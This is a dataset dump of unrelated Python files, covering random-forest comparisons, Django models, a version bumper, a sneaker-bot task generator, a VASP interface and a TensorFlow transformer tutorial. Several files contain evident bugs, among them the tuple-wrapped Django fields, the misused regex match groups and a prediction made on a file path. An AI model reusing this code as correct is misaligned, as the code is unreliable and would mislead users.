text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python
"""
* Get fortran code running for comparisons with R's party:cforest
** install cforest
** have script which runs forest and cforest on some dataset
** also run parf rf classifier on dataset
*** betsy: ~/scratch/rf_parf/parf
** compare results (will need to do crossvalidation)
** First try out on non-missing-value dataset
** Need some missing-feature datasets to try out
"""
import os, sys
import numpy
def example_initial_r_randomforest():
""" Initial example which trains and classifies a R randomForest classifier
Using 1 40/60 fold of debosscher data.
"""
algorithms_dirpath = os.path.abspath(os.environ.get("TCP_DIR") + 'Algorithms/')
sys.path.append(algorithms_dirpath)
import rpy2_classifiers
rc = rpy2_classifiers.Rpy2Classifier(algorithms_dirpath=algorithms_dirpath)
train_arff_str = open(os.path.expandvars("$HOME/scratch/full_deboss_1542srcs_20110106.arff")).read()
traindata_dict = rc.parse_full_arff(arff_str=train_arff_str)
Gen_Fold_Classif = rpy2_classifiers.GenerateFoldedClassifiers()
all_fold_data = Gen_Fold_Classif.generate_fold_subset_data(full_data_dict=traindata_dict,
n_folds=10,
do_stratified=False,
classify_percent=40.)
i_fold = 0 # of 10 folds
fold_data = all_fold_data[i_fold]
do_ignore_NA_features = False
classifier_fpath = os.path.expandvars("$HOME/scratch/classifier_RF_0.rdata")# % (i_fold))
Gen_Fold_Classif.generate_R_randomforest_classifier_rdata(train_data=fold_data['train_data'],
classifier_fpath=classifier_fpath,
do_ignore_NA_features=do_ignore_NA_features,
algorithms_dirpath=algorithms_dirpath)
r_name='rf_clfr'
classifier_dict = {'class_name':r_name}
rc.load_classifier(r_name=r_name,
fpath=classifier_fpath)
classif_results = rc.apply_randomforest(classifier_dict=classifier_dict,
data_dict=fold_data['classif_data'],
do_ignore_NA_features=do_ignore_NA_features)
print "classif_results['error_rate']=", classif_results['error_rate']
import pdb; pdb.set_trace()
print
def count_classes(class_list=[]):
"""
"""
count_dict = {}
for class_name in class_list:
if not count_dict.has_key(class_name):
count_dict[class_name] = 0
count_dict[class_name] += 1
return count_dict
def generate_parf_header_with_weighted_classes(count_dict={},
n_sources=0, arff_header=[]):
""" Given some class information and an existing arff header list,
generate a parf style @attribute class entry which has inverse proportional class weights.
"""
new_arff_header = []
for line in arff_header:
#if '@attribute source_id' in line.lower():
# new_arff_header.append('@ignored source_id NUMERIC')
# continue
if not "@attribute class" in line.lower():
new_arff_header.append(line)
continue
sub_line = line[line.find('{')+1:line.rfind('}')]
class_list = sub_line.split("','")
new_line = line[:line.find('{')+1]
total_weight = 0 # for sanity check only
for quoted_class_name in class_list:
class_name = quoted_class_name.strip("'")
class_weight = count_dict[class_name] / float(n_sources)
###Using NO WEIGHT:#
new_line += "'%s', " % (class_name)
### USING WEIGHTS (which, as calculated seem to worsen the final classification error)
### - it seems internal weights are used by PARF since nowt error rate agrees with R:randomForest
#new_line += "'%s' (%f), " % (class_name, class_weight)
total_weight += class_weight
new_line = new_line[:-2] + line[line.rfind('}'):]
print 'total_weight=', total_weight
#print 'line: ', line
#print 'new_line:', new_line
new_arff_header.append(new_line)
return new_arff_header
if __name__ == '__main__':
#example_initial_r_randomforest()
# I want to do the following over the same folded datasets
# I also want to use the same parms
#####parf --verbose -t ~/scratch/full_deboss_1542srcs_20110106.arff -a ~/scratch/full_deboss_1542srcs_20110106.arff -n 1000 -m 25
# NOTE: this is compiled differently (with different FFLAGS, CFLAGS) than for library/python wrapping version:
parf_exec_fpath = '/home/pteluser/scratch/rf_parf__back_copy2/parf/parf'
noisify_attribs = [ \
'freq1_harmonics_amplitude_0',
'freq1_harmonics_amplitude_1',
'freq1_harmonics_amplitude_2',
'freq1_harmonics_amplitude_3',
'freq1_harmonics_rel_phase_0',
'freq1_harmonics_rel_phase_1',
'freq1_harmonics_rel_phase_2',
'freq1_harmonics_rel_phase_3',
'freq2_harmonics_amplitude_0',
'freq2_harmonics_amplitude_1',
'freq2_harmonics_amplitude_2',
'freq2_harmonics_amplitude_3',
'freq2_harmonics_rel_phase_0',
'freq2_harmonics_rel_phase_1',
'freq2_harmonics_rel_phase_2',
'freq2_harmonics_rel_phase_3',
'freq3_harmonics_amplitude_0',
'freq3_harmonics_amplitude_1',
'freq3_harmonics_amplitude_2',
'freq3_harmonics_amplitude_3',
'freq3_harmonics_freq_0',
'freq3_harmonics_rel_phase_0',
'freq3_harmonics_rel_phase_1',
'freq3_harmonics_rel_phase_2',
'freq3_harmonics_rel_phase_3',
'freq_amplitude_ratio_31',
'freq_frequency_ratio_31',
'freq_signif_ratio_31',
'skew',
'qso_log_chi2_qsonu',
'qso_log_chi2nuNULL_chi2nu',
'median_absolute_deviation',
'std',
'stetson_j',
'percent_difference_flux_percentile']
ntrees = 100
mtry=25
nodesize=5
use_missing_values = True
prob_source_has_missing=0.3
prob_misattrib_is_missing=0.5
algorithms_dirpath = os.path.abspath(os.environ.get("TCP_DIR") + 'Algorithms/')
sys.path.append(algorithms_dirpath)
import rpy2_classifiers
rc = rpy2_classifiers.Rpy2Classifier(algorithms_dirpath=algorithms_dirpath)
train_arff_str = open(os.path.expandvars("$HOME/scratch/full_deboss_1542srcs_20110106.arff")).read()
if use_missing_values:
train_arff_str = rc.insert_missing_value_features(arff_str=train_arff_str,
noisify_attribs=noisify_attribs,
prob_source_has_missing=prob_source_has_missing,
prob_misattrib_is_missing=prob_misattrib_is_missing)
traindata_dict = rc.parse_full_arff(arff_str=train_arff_str, fill_arff_rows=True)
arff_header = rc.parse_arff_header(arff_str=train_arff_str)#, ignore_attribs=['source_id'])
Gen_Fold_Classif = rpy2_classifiers.GenerateFoldedClassifiers()
all_fold_data = Gen_Fold_Classif.generate_fold_subset_data(full_data_dict=traindata_dict,
n_folds=10,
do_stratified=False,
classify_percent=40.)
temp_arff_fpath_root = os.path.expandvars("/tmp/parf")
meta_parf_avgs = []
meta_R_randomForest_avgs = []
meta_R_cforest_avgs = []
for k in range(50):
parf_fpath_dict = {}
results_dict = {}
for i_fold, fold_dict in all_fold_data.iteritems():
parf_fpath_dict[i_fold] = {}
results_dict[i_fold] = {}
for data_case in fold_dict.keys():
if data_case == 'train_data':
count_dict = count_classes(class_list=fold_dict['train_data']['class_list'])
n_sources = len(fold_dict['train_data']['class_list'])
new_arff_header = generate_parf_header_with_weighted_classes(count_dict=count_dict, n_sources=n_sources, arff_header=arff_header)
else:
new_arff_header = arff_header
fold_arff_lines = []
fold_arff_lines.extend(new_arff_header)
fold_arff_lines.extend(fold_dict[data_case]['arff_rows'])
fold_arff_fpath = "%s_%s_%d" % (temp_arff_fpath_root, data_case, i_fold)
if os.path.exists(fold_arff_fpath):
os.system('rm ' + fold_arff_fpath)
fp = open(fold_arff_fpath, 'w')
for line in fold_arff_lines:
fp.write(line + '\n')
fp.close()
parf_fpath_dict[i_fold][data_case] = fold_arff_fpath
### Do parf classification
exec_parf_str = '%s -t %s -a %s -n %d -m %d -xs %d -ri source_id -uu source_id' % ( \
parf_exec_fpath,
parf_fpath_dict[i_fold]['train_data'],
parf_fpath_dict[i_fold]['classif_data'],
ntrees, mtry, nodesize)
print exec_parf_str
(a,b,c) = os.popen3(exec_parf_str)
a.close()
c.close()
lines_str = b.read()
b.close()
lines = lines_str.split('\n')
for line in lines:
if not 'Testset classification error' in line:
continue
vals = line.split()
class_error = float(vals[4].strip('%'))
kappa = float(vals[8])
results_dict[i_fold]['parf'] = {'class_error':class_error,
'kappa':kappa}
if not use_missing_values:
### Do the R randomForest here:
do_ignore_NA_features = False
for i_fold, fold_data in all_fold_data.iteritems():
classifier_fpath = os.path.expandvars("$HOME/scratch/classifier_RF_%d.rdata" % (i_fold))
Gen_Fold_Classif.generate_R_randomforest_classifier_rdata(train_data=fold_data['train_data'],
classifier_fpath=classifier_fpath,
do_ignore_NA_features=do_ignore_NA_features,
algorithms_dirpath=algorithms_dirpath,
ntrees=ntrees, mtry=mtry,
nfolds=10, nodesize=nodesize)
r_name='rf_clfr'
classifier_dict = {'class_name':r_name}
rc.load_classifier(r_name=r_name,
fpath=classifier_fpath)
classif_results = rc.apply_randomforest(classifier_dict=classifier_dict,
data_dict=fold_data['classif_data'],
do_ignore_NA_features=do_ignore_NA_features)
print "classif_results['error_rate']=", classif_results['error_rate']
results_dict[i_fold]['randomForest'] = {'class_error':classif_results['error_rate']}
# # # # # #
# # # # # #
# # # # # #
### Do the R cforest here:
do_ignore_NA_features = False
for i_fold, fold_data in all_fold_data.iteritems():
classifier_fpath = os.path.expandvars("$HOME/scratch/classifier_RF_%d.rdata" % (i_fold))
print 'generating cforest...'
Gen_Fold_Classif.generate_R_randomforest_classifier_rdata(train_data=fold_data['train_data'],
classifier_fpath=classifier_fpath,
do_ignore_NA_features=do_ignore_NA_features,
algorithms_dirpath=algorithms_dirpath,
ntrees=ntrees, mtry=mtry,
nfolds=10, nodesize=nodesize,
classifier_type='cforest')
r_name='rf_clfr'
classifier_dict = {'class_name':r_name}
rc.load_classifier(r_name=r_name,
fpath=classifier_fpath)
print 'applying cforest...'
classif_results_cforest = rc.apply_cforest(classifier_dict=classifier_dict,
data_dict=fold_data['classif_data'],
do_ignore_NA_features=do_ignore_NA_features)
print "classif_results['error_rate']=", classif_results_cforest['error_rate']
results_dict[i_fold]['cforest'] = {'class_error':classif_results_cforest['error_rate']}
##### Analyze the results (compare the classifiers):
parf_errors = []
randomForest_errors = []
cforest_errors = []
for i_fold in all_fold_data.keys():
parf_errors.append(results_dict[i_fold]['parf']['class_error'] / 100.)
randomForest_errors.append(results_dict[i_fold].get('randomForest',{}).get('class_error',-1))
cforest_errors.append(results_dict[i_fold]['cforest']['class_error'])
#meta_parf_avgs.append(numpy.mean(parf_errors))
#meta_R_randomForest_avgs.append(numpy.mean(randomForest_errors))
#meta_R_cforest_avgs.append(numpy.mean(cforest_errors))
meta_parf_avgs.extend(parf_errors)
meta_R_randomForest_avgs.extend(randomForest_errors)
meta_R_cforest_avgs.extend(cforest_errors)
print "PARF mean=%lf, std=%lf" % (numpy.mean(parf_errors), numpy.std(parf_errors))
print "randomForest mean=%lf, std=%lf" % (numpy.mean(randomForest_errors), numpy.std(randomForest_errors))
print "cforest mean=%lf, std=%lf" % (numpy.mean(cforest_errors), numpy.std(cforest_errors))
#### Put this within the inner loop so can see how this is improving:
print 'META PARF :', numpy.mean(meta_parf_avgs), numpy.std(meta_parf_avgs), k*10 + i_fold
print 'META randomForest:', numpy.mean(meta_R_randomForest_avgs), numpy.std(meta_R_randomForest_avgs), k*10 + i_fold
print 'META cforest :', numpy.mean(meta_R_cforest_avgs), numpy.std(meta_R_cforest_avgs), k*10 + i_fold
print 'Final META PARF :', numpy.mean(meta_parf_avgs), numpy.std(meta_parf_avgs)
print 'Final META randomForest:', numpy.mean(meta_R_randomForest_avgs), numpy.std(meta_R_randomForest_avgs)
print 'Final META cforest :', numpy.mean(meta_R_cforest_avgs), numpy.std(meta_R_cforest_avgs)
import pdb; pdb.set_trace()
print
|
#config.py
# Config file for PyGlass Client
from configobj import ConfigObj
#This imported by PyGlass via import config
#
#CONSTANTS
TEST = 1 #run test routine (will not recieve any data from Flight Sim program)
FSXSP0 = 2 #Recieve data from test routine
FSXSP1 = 3
FSXSP2 = 4
ESP = 5
CLIENT = 6
modes = {'Test':1,'FSXSP0':2,'FSXSP1':3,'FSXSP2':4,'ESP':5}
modes_list = ['Test','FSXSP0','FSXSP1','FSXSP2','ESP']
class general_c(object):
def __init__(self, filename):
self.config = ConfigObj(filename)
# self.glassserver_port = int(self.config['GlassServer']['port'])
# self.webserver_port = int(self.config['WebServer']['port'])
client = general_c('config.cfg') |
"""
BasicWriter Class
"""
from logging import Logger
import os
from ..common import get_default_logger, WriteFileAlreadyExists
from ..format.ynf import cYnf
class BasicWriter(object):
"""
BasicWriterクラス。
Ynf形式から何かのフォーマットへ変換する処理の基底クラス。
"""
def __init__(self, file_path:str, overwrite:bool=False, logger:Logger=None):
"""
コンストラクタ
Parameters
----------
file_path: str
出力するファイルパス
overwrite: bool
既に存在する場合は上書きするオプション
logger: Logger
ロガー。指定されない場合は別途定義してあるデフォルトロガー。
"""
# ロガーを設定
self.logger = logger or get_default_logger()
# 開始ログ
msg = f'Start writing. ({self.__class__.__name__})'
self.logger.info(msg)
self.logger.info(f'file:{file_path}')
# ファイルが既に存在している場合は、Overwriteオプションがついていないとダメ
if os.path.exists(file_path):
if not overwrite:
raise WriteFileAlreadyExists(
'Write file is already exists. ' + \
'Consider using a option `overwrite=True`.'
)
# フォルダが存在している場合は、エラー
if os.path.isdir(file_path):
raise WriteFileAlreadyExists(
f'Directory is exists. ({file_path})'
)
# overwrite指定されている場合はここで消す
os.remove(file_path)
# 属性を設定
self.file_path = file_path
def write(self, ynf: cYnf):
"""
コンストラクタで指定したファイルを出力する
派生クラスでオーバーライドすること。
Parameters
----------
ynf: cYnf
出力するcYnfインスタンス
"""
raise NotImplementedError
def write_from_ynf_file(self, file_path: str):
"""
Ynfファイル指定でファイルを出力する
Parameters
----------
file_path: str
出力するcYnfのシリアライズしたファイル
"""
# デシリアライズする
ynf = cYnf.deserialize(file_path)
# 出力する
self.write(ynf)
|
#!/bin/python3
"""
bumper
======
Version bumping interface.
Allows bumping by specified version and SemVer semantics.
"""
from abc import ABCMeta, abstractmethod
from garden.log import logger
import argparse
import enum
import re
_logger = logger
#: Regex for matching version numbers
RE_VERSION = '(?P<version>(?:\d+\.?){3})'
_version_help = ('Either a Semantic Version alias (patch, minor, major), or a'
' specified version, like x.y.z')
class SemVer(enum.Enum):
patch = 'patch'
minor = 'minor'
major = 'major'
def snr(line_gen, pattern, version):
"""Search & replace a pattern from a stream of strings.
The first capture group will be replaced with the given version.
"""
p = re.compile(pattern, re.MULTILINE)
line = next(line_gen, False)
while line:
yield eager_replace(p, version, line)
line = next(line_gen, False)
def eager_replace(pattern, repl, line):
m = re.match(pattern, line)
if m:
line = re.sub(m.groups[1], repl, line)
return line
class Bumper(metaclass=ABCMeta):
@abstractmethod
def bump(self, target, version=SemVer.patch, **kwargs):
"""Increments the target version with the code base.
It is up to the implementation to define valid targets.
:arg str target: Name of target within code.
:kwarg `SemVer` semver: Semantic version level to version bump by.
"""
return
@property
@abstractmethod
def targets(self):
"""Returns a list of targets available for bumping."""
return
@classmethod
def __subclasshook__(cls, C):
# If comparing *against* Bumper
if cls is Bumper:
if any("bump" in B.__dict__ for B in C.__mro__):
return True
return NotImplemented
def bump_version(version, new_version=SemVer.patch):
"""Changes the version by the given semantic versioning new_version, or specific
version."""
if re.match(RE_VERSION, version):
return new_version
x = split_version()
if new_version == SemVer.patch:
x[2] += 1
elif new_version == SemVer.minor:
x[2] = 0
x[1] += 1
elif new_version == SemVer.major:
x[1], x[2] = 0, 0
x[0] += 1
else:
_logger.warning('No semver match')
return version
return '.'.join(list(map(str, x)))
def to_version(arg):
"""Converts 'arg' to a SemVer value of 'x.y.z' string."""
try:
return SemVer(arg)
except ValueError:
if re.match(RE_VERSION, arg):
return arg
else:
raise argparse.ArgumentError(_version_help)
def split_version(version):
return list(map(int, version.split('.')))
def setup_parser(argparser, repos):
"""Attach arguments to the given argparser."""
def do_bump(args):
_logger.debug('Calling bump on %s', args.repo)
try:
# Load the entrypoint code
repos['bump'][args.repo].load()
# Call registered 'bump' method on target repo
repos[args.repo](args.target, args.version, *args.args)
except KeyError:
_logger.warning("No repo called '%s' found", args.repo)
argparser.add_argument('repo')
argparser.add_argument('target', type=str)
argparser.add_argument('version', type=to_version, help=_version_help)
argparser.add_argument('args', nargs=argparse.REMAINDER,
help='Addtional arguments to pass through')
argparser.set_defaults(func=do_bump)
_logger.debug('Setup bump() parsing')
|
import math
print(math.pow(6,1000)) |
import json
global profile_list
profile_list = []
with open("profiles.txt","r") as file:
for profile in file:
profile_list.append(profile[:-1])
global logins_undftd
logins_undftd = []
with open("logins_undftd.txt","r") as file:
for line in file:
login = {}
login.update({"username":line.split(":")[0]})
login.update({"password":line.split(":")[1][:-1]})
logins_undftd.append(login.copy())
global size_list
size_list = []
with open("sizes.txt","r") as file:
for line in file:
size_list.append(line[:-1])
def listCycle(list0):
q = list0[0]
list0.append(list0[0])
list0.pop(0)
return q
site = raw_input('''
################################### ~ CHOOSE A SITE BY ENTERING SITE NAME EXACTLY AS SHOWN BELOWN ~ #################################################
12amrun 18montrose A-Ma-Maniere APBStore AddictMiami AntiSocialSocialClub Attic
BBCIceCream BBCIceCreamEU Bape* Beatniconline BlackMarketUS Blends Bodega
BowsAndArrows BurnRubber Commonwealth Concepts CrtsdSnkrs DSM-EU DSM-JP
DSM-SG DSM-US DreamTown* EllenShop Exclucity ExtraButter FearOfGod
Feature FiceGallery FunkoShop* GoodAsGold GraffitiPrints HanonShop Haven
HighsAndLows HistoryOfNY Hotoveli JustDon JustinTimberlake Kith KylieCosmetics
LaceUpNYC LapstoneAndHammer LessOneSeven Livestock Machus MarathonSports MiniShopMadrid
NRML Noirfonce Nomad* Notre ObeyGiant OctobersVeryOwnCA* OctobersVeryOwnUK
OctobersVeryOwnUS* OffTheHook Oipolloi Omocat Oneness287 PackerShoes PalaceUS
Par5MilanoYeezy Places+Faces ProperLBC RSVPGallery ReigningChamp Renarts RimeNYC
Rise45 RockCityKicks RoninDivision RonnieFieg SaintAlfred ShoeGalleryMiami ShopNiceKicks
SneakerPolitics SneakerWorldShop SocialStatusPHG Solefly Soleheaven Stampd StaplePigeon
StoneIsland Suede TheClosetInc TheDarkSideInitiative TravisScott* TrophyRoom Undefeated
Unknwn Vlone WishATL WorldOfHombre Xhibition YeezySupply
######################################################################################################################################################
################################## You may enter more than one site like this Kith, HanonShop, Undefeated ############################################
######################################################################################################################################################
>> ''')
site_list = []
if "," in site:
site_list = site.split(",")
global sites
sites = []
for site in site_list:
for i in range(0,len(size_list)):
sites.append(site)
maxtasks = raw_input("How many tasks? >>")
maxtasks = int(maxtasks)
captcha = raw_input('''
1 - No captcha
2 - Captcha
''')
if captcha == "1":
hasCaptcha = False
else:
hasCaptcha = True
keywords = raw_input('''
Please type in your keywords (i.e. +jordan,+off,+white,+1)
''')
if site == "Undefeated":
useAccount = True
else:
useAccount = False
tasks = []
count = 0
for i in range(0,maxtasks):
task = {}
task.update({"atcQuantity":""})
task.update({"checkoutMode":"old"})
task.update({"hasCaptcha":hasCaptcha})
task.update({"id":count})
task.update({"monitorInput":keywords})
task.update({"monitorType":"keywords"})
task.update({"newProductsOnly":False})
task.update({"password":listCycle(logins_undftd)["password"]})
task.update({"profile":listCycle(profile_list)})
task.update({"scheduleTask":False})
task.update({"scheduleTime":""})
if len(site_list) > 1:
task.update({"site":listCycle(sites)})
else:
task.update({"site":site})
task.update({"size":listCycle(size_list)})
for site in sites:
if "Undefeated" in site:
useAccount = True
continue
else:
useAccount = False
task.update({"useAccount":useAccount})
task.update({"username":listCycle(logins_undftd)["username"]})
tasks.append(task.copy())
count = count + 1
with open("Generated Tasks.json","w") as file:
json.dump(tasks,file)
|
from django.db import models
class Transactions(models.Model):
amount = models.BigIntegerField(),
user_ID_from = models.PositiveIntegerField(),
user_ID_to = models.PositiveIntegerField(),
date = models.parse_datetime(),
#TODO @classmethod
#TODO def create_transaction(cls, amount,user_ID_from, user_ID_to,date):
|
import pandas as pd
import numpy as np
from sklearn.cross_validation import train_test_split
#import GCForest
import pandas as pd
import time
import numpy as np
from sklearn.model_selection import train_test_split
#from GCForest import gcForest
from sklearn.metrics import accuracy_score
from gcforest.gcforest import GCForest
data= pd.read_csv('/Users/YanYu/Downloads/all/train.csv')
#print(data.shape)
ddata=np.array(data)
x=ddata[:1000,1:785].copy()
y=ddata[:1000,:1].copy()
y=y.flatten()
#print(x)
#print(y.shape)
X_train,X_test,y_train,y_test=train_test_split(x,y,test_size=0.25,random_state=9)
#print(y_train)
gcf = GCForest(shape_1X=[28,28], window=[14,16], tolerance=0.0, min_samples_mgs=10, min_samples_cascade=7)
gcf.fit(X_train, y_train)
pred_X = gcf.predict('Users/YanYu/Downloads/all/test.csv')
#print (pred_X)
accuracy = accuracy_score(y_true=y_test, y_pred=pred_X)
print ('gcForest accuracy:{}'.format(accuracy))
|
# Generated by Django 3.0.3 on 2020-03-16 18:43
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ClienteModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=30)),
('sobrenome', models.CharField(max_length=30)),
('cidade', models.CharField(blank=True, max_length=20)),
('estado', models.CharField(blank=True, max_length=15)),
('rua', models.CharField(blank=True, max_length=100)),
('numero_casa', models.CharField(blank=True, max_length=6)),
('cep', models.CharField(blank=True, max_length=20)),
('telefone', models.CharField(blank=True, max_length=15)),
('email', models.EmailField(blank=True, help_text='Ex. clinte@gmail.com', max_length=50)),
],
options={
'ordering': ['nome', 'sobrenome'],
},
),
migrations.CreateModel(
name='DimensaoModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comprimento', models.FloatField(help_text='Ex. 8.00', max_length=3)),
('largura', models.FloatField(help_text='Ex. 4.00', max_length=3)),
('prof_inicial', models.FloatField(help_text='Ex. 1.20', max_length=3)),
('prof_final', models.FloatField(help_text='Ex. 1.40', max_length=3)),
('largura_calcada', models.FloatField(blank=True, default=1, help_text='Ex. 1.00', max_length=3)),
('espessura', models.CharField(choices=[['0.6', '0.6 mm'], ['0.7', '0.7 mm'], ['0.8', '0.8 mm']], help_text='Espessura do vinil', max_length=3)),
('fornecedor', models.CharField(choices=[['sodramar', 'Sodramar'], ['viniplas', 'Viniplas']], help_text='Fornecedor do vinil', max_length=8)),
('profundidade_media', models.FloatField(max_length=5)),
('area_calcada', models.FloatField(max_length=5)),
('perimetro', models.FloatField(max_length=5)),
('m2_facial', models.FloatField(max_length=5)),
('m2_parede', models.FloatField(max_length=5)),
('m2_total', models.FloatField(max_length=5)),
('m3_total', models.FloatField(max_length=5)),
('m3_real', models.FloatField(max_length=5)),
('filtro', models.CharField(max_length=30)),
('motobomba', models.CharField(max_length=30)),
('tampa_casa_maquinas', models.CharField(max_length=30)),
('sacos_areia', models.CharField(max_length=30)),
('vinil_m2', models.FloatField(max_length=5)),
('isomanta_m2', models.FloatField(max_length=5)),
('perfil_fixo_m', models.FloatField(max_length=5)),
('escavacao', models.CharField(max_length=30)),
('construcao', models.CharField(max_length=30)),
('contra_piso', models.CharField(max_length=30)),
('remocao_terra', models.CharField(max_length=30)),
('instalacao_vinil', models.CharField(max_length=30)),
('data', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(blank=True, choices=[('Em negociação', 'Em negociação'), ('Contrato', 'Contrato'), ('Encerrado', 'Encerrado')], default='Em negociação', help_text='Status do Orçamento', max_length=15)),
],
),
]
|
import os
from ase.io import vasp
from ase.io import lammpsdata
import configparser
import sys
binVasp = 'vasp_std'
elements = []
def readVASP(inputFile):
global binVasp
global elements
# Read input data for the interface
config = configparser.ConfigParser()
config.read(inputFile)
vars = config['VASP']
for key in vars:
if key == 'binvasp':
try:
binVasp = str(vars[key])
# if not os.path.isfile(binVasp):
# print('Binary file for VASP could not be found: '+binVasp)
# raise Exception('File error')
except:
print('Invalid value for variable: ' +key)
elif key == 'elements':
try:
elements = vars[key].split()
print('elements found are:')
print(elements)
except:
print('Invalid value for variable: ' +key)
else:
print('Invalid variable: '+key)
sys.exit(1)
def compute(exec, training, numprocs):
# Convert lammps data file to POSCAR file
dftDir = 'DFT'
os.makedirs(dftDir, exist_ok=True)
computeDir = os.path.join(dftDir, 'dft'+str(training))
os.system('cp -r vaspInput '+computeDir)
lammps = lammpsdata.read_lammps_data('Restart/check.data', style='atomic')
#Count lammps types and assign elements
ids = lammps.get_atomic_numbers()
ids.sort()
amounts = []
t = ids[0]
count = 0
for i in range(len(ids)):
if ids[i] == t:
count += 1
else:
amounts.append(count)
count = 1
t = ids[i]
amounts.append(count)
if len(amounts) != len(elements):
print('Number of elements is not the same than number of types in LAMMPS')
sys.exit(1)
symbols = ''
for i in range(len(elements)):
symbols += elements[i] + str(amounts[i])
lammps.symbols = symbols
os.chdir(computeDir)
vasp.write_vasp('POSCAR', lammps)
os.system(exec+' -n '+str(numprocs)+' '+binVasp+' > out-dft.txt')
os.chdir('../..') |
from tf2_models.attention.transformer import point_wise_feed_forward
from tf2_models.attention.transformer import transformer
from tf2_models.attention import masks
import tensorflow as tf
import tensorflow_datasets as tfds
import time
import numpy as np
import matplotlib.pyplot as plt
import logging
logger = tf.get_logger()
logger.setLevel(logging.INFO)
MAX_LENGTH = 40
BUFFER_SIZE = 20000
BATCH_SIZE = 64
EPOCHS = 20
def viz_point_wise_feed_forward():
sample_ffn = point_wise_feed_forward.point_wise_feed_forward_network(512, 2048)
print(sample_ffn(tf.random.uniform((64, 50, 512))).shape)
sample_conv = point_wise_feed_forward.point_wise_1d_conv(512, 1000)
print(sample_conv(tf.random.uniform((64, 50, 512))).shape)
print(sample_conv == sample_ffn)
def download_demo_data():
examples, metadata = tfds.load('ted_hrlr_translate/pt_to_en', with_info=True,
as_supervised=True)
train_examples, val_examples = examples['train'], examples['validation']
tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(en.numpy() for pt, en in train_examples), target_vocab_size=2 ** 13)
tokenizer_pt = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(pt.numpy() for pt, en in train_examples), target_vocab_size=2 ** 13)
sample_string = 'Transformer is awesome.'
tokenized_string = tokenizer_en.encode(sample_string)
print('Tokenized string is {}'.format(tokenized_string))
original_string = tokenizer_en.decode(tokenized_string)
print('The original string: {}'.format(original_string))
assert original_string == sample_string
for ts in tokenized_string:
print('{} ----> {}'.format(ts, tokenizer_en.decode([ts])))
# it = iter(train_examples)
# ne = next(it)
# print(ne)
return train_examples, val_examples, tokenizer_en, tokenizer_pt
train_examples, val_examples, tokenizer_en, tokenizer_pt = download_demo_data()
def encode(lang1, lang2):
"""Add a start and end token to the input and target."""
lang1 = [tokenizer_pt.vocab_size] + tokenizer_pt.encode(
lang1.numpy()) + [tokenizer_pt.vocab_size + 1]
lang2 = [tokenizer_en.vocab_size] + tokenizer_en.encode(
lang2.numpy()) + [tokenizer_en.vocab_size + 1]
return lang1, lang2
def tf_encode(pt, en):
"""Wrapper for tf.py_function.
The tf.py_function will pass regular tensors (with a value and a .numpy()
method to access it), to the wrapped python function
"""
result_pt, result_en = tf.py_function(encode, [pt, en], [tf.int64, tf.int64])
result_pt.set_shape([None])
result_en.set_shape([None])
return result_pt, result_en
def filter_max_length(x, y, max_length=MAX_LENGTH):
"""To keep this example small and relatively fast, drop examples with a length of over 40 tokens."""
return tf.logical_and(tf.size(x) <= max_length,
tf.size(y) <= max_length)
def create_dataset():
train_preprocessed = (
train_examples
.map(tf_encode)
.filter(filter_max_length)
# cache the dataset to memory to get a speedup while reading from it.
.cache()
.shuffle(BUFFER_SIZE))
val_preprocessed = (
val_examples
.map(tf_encode)
.filter(filter_max_length))
#
# Pad and batch examples togheter:
#
train_dataset = (train_preprocessed
.padded_batch(BATCH_SIZE, padded_shapes=([None], [None]))
.prefetch(tf.data.experimental.AUTOTUNE))
val_dataset = (val_preprocessed
.padded_batch(BATCH_SIZE, padded_shapes=([None], [None])))
pt_batch, en_batch = next(iter(val_dataset))
print("pt batch:\nshape: {}\n values: {}\n en batch:shape: {}\n values: {}\n".format(pt_batch.shape, pt_batch,
en_batch.shape, en_batch))
return train_dataset, val_dataset
class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):
def __init__(self, d_model, warmup_steps=4000):
super(CustomSchedule, self).__init__()
self.d_model = d_model
self.d_model = tf.cast(self.d_model, tf.float32)
self.warmup_steps = warmup_steps
def __call__(self, step):
arg1 = tf.math.rsqrt(step)
arg2 = step * (self.warmup_steps ** -1.5)
return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)
def train_translation_model():
"""Train Portuguese-to-english translation model.
from the official tf tutorial.
:return:
"""
train_dataset, val_dataset = create_dataset()
num_layers = 4
d_model = 128
dff = 512
num_heads = 8
input_vocab_size = tokenizer_pt.vocab_size + 2
target_vocab_size = tokenizer_en.vocab_size + 2
dropout_rate = 0.1
learning_rate = CustomSchedule(d_model)
optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98,
epsilon=1e-9)
temp_learning_rate_schedule = CustomSchedule(d_model)
plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32)))
plt.ylabel("Learning Rate")
plt.xlabel("Train Step")
loss_object = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction='none')
# Since the target sequences are padded, it is important to apply a padding mask when calculating the loss.
def loss_function(real, pred):
mask = tf.math.logical_not(tf.math.equal(real, 0))
loss_ = loss_object(real, pred)
mask = tf.cast(mask, dtype=loss_.dtype)
loss_ *= mask
return tf.reduce_sum(loss_) / tf.reduce_sum(mask)
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(
name='train_accuracy')
transformer_obj = transformer.Transformer(num_layers, d_model, num_heads, dff,
input_vocab_size, target_vocab_size,
pe_input=input_vocab_size,
pe_target=target_vocab_size,
rate=dropout_rate)
def create_masks(inp, tar):
# Encoder padding mask
enc_padding_mask = masks.create_padding_mask(inp)
# Used in the 2nd attention block in the decoder.
# This padding mask is used to mask the encoder outputs.
dec_padding_mask = masks.create_padding_mask(inp)
# Used in the 1st attention block in the decoder.
# It is used to pad and mask future tokens in the input received by
# the decoder.
look_ahead_mask = masks.create_look_ahead_mask(tf.shape(tar)[1])
dec_target_padding_mask = masks.create_padding_mask(tar)
combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask)
return enc_padding_mask, combined_mask, dec_padding_mask
